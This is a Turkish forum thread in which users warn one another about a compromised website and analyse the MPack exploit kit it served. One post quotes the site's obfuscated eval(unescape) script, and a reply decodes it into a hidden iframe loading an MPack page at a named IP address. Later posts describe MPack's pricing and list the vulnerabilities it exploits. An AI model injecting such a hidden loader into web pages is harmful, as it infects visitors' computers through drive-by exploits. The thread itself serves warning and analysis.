Virüs - Trojan - Keylogger - BotNet
Sevmiyorum Böyle Konuları Ama Uyarayım Dedim.
Sevmiyorum Böyle Konuları Ama Uyarayım Dedim.
-
müritler biliyosunuz ayyıldız eziklik yaşadıktan sonra belini düzeltemedi. Ben az önce bakim şu siteye dedim, belki ezikliğe devam ederler diye ayyildiz adresine girdim amk kaspersky paso virüs uyarısı veriyo şaşırdım engelledim, yine lamerlik peşinde sanırım, söylemedi demeyin, siteye girerseniz antivirüs firewall filan açık tutun derim. Beni teyit edin bakem :-)
-
Hacı bu olay artık çok yaşanmaya başladı, ben genelde yabancı çok siteleride geziyorum ve denk gelebiliyor. sanırım bu işi yapanların amacı prorat, turkojen v.s gibi serverları yedirmek değil yada siktiribokdan bi keyloggerı.
Siteye bakmadım ama irc trojanı denilen botlardandır büyük ihtimalle...
-
<script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>
bi script var. comodo uyarmadı ...
-
document.write("<iframe src=\"http://81.95.150.82/mpack/index.php\" width=0 height=0 style=\"display:none\"></iframe>");
window.status=" ";unescape içindeki hexlerin decode edilmiş hali...
-
MPack is a PHP-based malware kit produced by Russian hackers
hacılar şimdi ben decode edilen adrese bakmadım ama sanırım bi piçlik var bu işte.... mpack ile ilgi linkler.
http://en.wikipedia.org/wiki/MPack_(software)
http://isc.sans.org/diary.html?storyid=3015
http://www.symantec.com/enterprise/security_response/weblog/2007/05/mpack_packed_full_of_badness.html
galiba güncel exploitler bulaştırılıp pc kontrol ediliyor....
-
Eğer bu piçlerin kullandığı olay böyle bişeyse türçe açıklamasını buldum.
Panda Labs. Uzmanları Mpack adlı yeni bir trojan tespit etti, Trojan bulaştığı makinelere çeşitli virus içerikli yazılımlar indiriyor. Yontem Basit: Saldırgan Trojanı seçiyor ve bilgisayarlara bulaştırmak için kullanıyor. Panda Labs. tarafından verilen rapordaki istatistiklere göre 160.000 bilgisayar Mpack Trojanı tarafından doğrudan etkilendi.Elde edilen bilgi doğrudan Mpack in kendi istatistik eklentisinden sağlandı.
Trojan bulaştığı makinelerde saldırgana tam kontrol sağlıyor, örneğin bulaştığı makinedeki data geçişini izleme fırsatı tanıyor hatta Saldırgan işletim sistemine yada tarayıcısına göre trojanın bulaştığı makineleri grup grup ayırabiliyor.
Çeşitli forumlarda Paket 700$ dan satılıyor. Ayrıca Bu ücrete 1 yıllık destekde dahil.
Panda Labs. ın Teknik Bölüm yöneticisi Mr. Luis Corron'a göre "Kullanıcılar Mpack in ilerde zararsız hale gelmesini umut etsinler" Örneğin Güncellemeler. Bu Güncellemeler Mpack in çeşitli versiyonlarına dayanır , nede olsa exploitlerin yeni açıkları keşfetmeye ihtiyacı vardır.Her ay yeni bitane çıkması gayet normal ve ücretleri 50$ ile 150$ arasında değişir.300$ ödeyerek DreamDownloader ı satın alabilirsiniz, Dreamdownload Trojanları download etmek için bir araçtır. Birinin -be yada worm- kelimeleri ile başlayan dosyaları herhangi biyere yüklemesi Dreamdownloader için yeterlidir ve dosyayı kolayca indirilebilir hale getirir.
Kaynak: http://tr.zone-h.org/content/view/241/9/
-
Internet Explorer 7 kullanın. 6'da büyük riskler var.
-
şimdi bu siktimin olayı böyle bulaşıyo sanırım. ve o anda kullandığınız uygulamalar winamp, quicktime, browser açıkları v.s kullanarak sisteminize trojan bulaştırıyor. bu mpack inde versiyonları vamış mesela v90 da bu açıkları kullanarak sizlere zarar veriyor.
- Modified MS06-014 with the maximized efficiency
- MS06-006 under Firefox 1.5.x and Opera 7.x
- unnamed 0day for Win2000 (ms06-044)
= XML overflow under XP \2k3 with a delay on operation
= WebViewFolderIcon overflow
= WinZip ActiveX overflow
= QuickTime overflow
= ANI overflow -
6.post olu galiba umarım bokunu çıkarmadım. :)
şimdi gençlik tamamiyle bu siktimin olayını açıklayım size.
eğer siz bu tarz bir adrese tıkladığınızda yada girdiğiniz
herhangibir sayfada iframe içerisinde mpack olayı çalışıyorsa
ilk olarak hangi exploitin sisteminizde çalıştırılabileceğini saptıyor.
eğer exploite karşı savunmasızsanız iseniz exploit çalışıyor ve daha sonra
başka bir modülüde size çalıştırılmak üzere bir exe gönderiyor. olay bundan ibarettir :)))hatta bunu kullanan adamlar hangi iplerin, ülkelerin, browserların ve işletim sistemlerine
bulaştığına dair istatistik bile tutuyolar. -
o deilde aqdnz sayfanın :D
-
FireX bunu yazdı:
-----------------------------
Internet Explorer 7 kullanın. 6'da büyük riskler var.
-----------------------------Mozilla Fire Fox ;)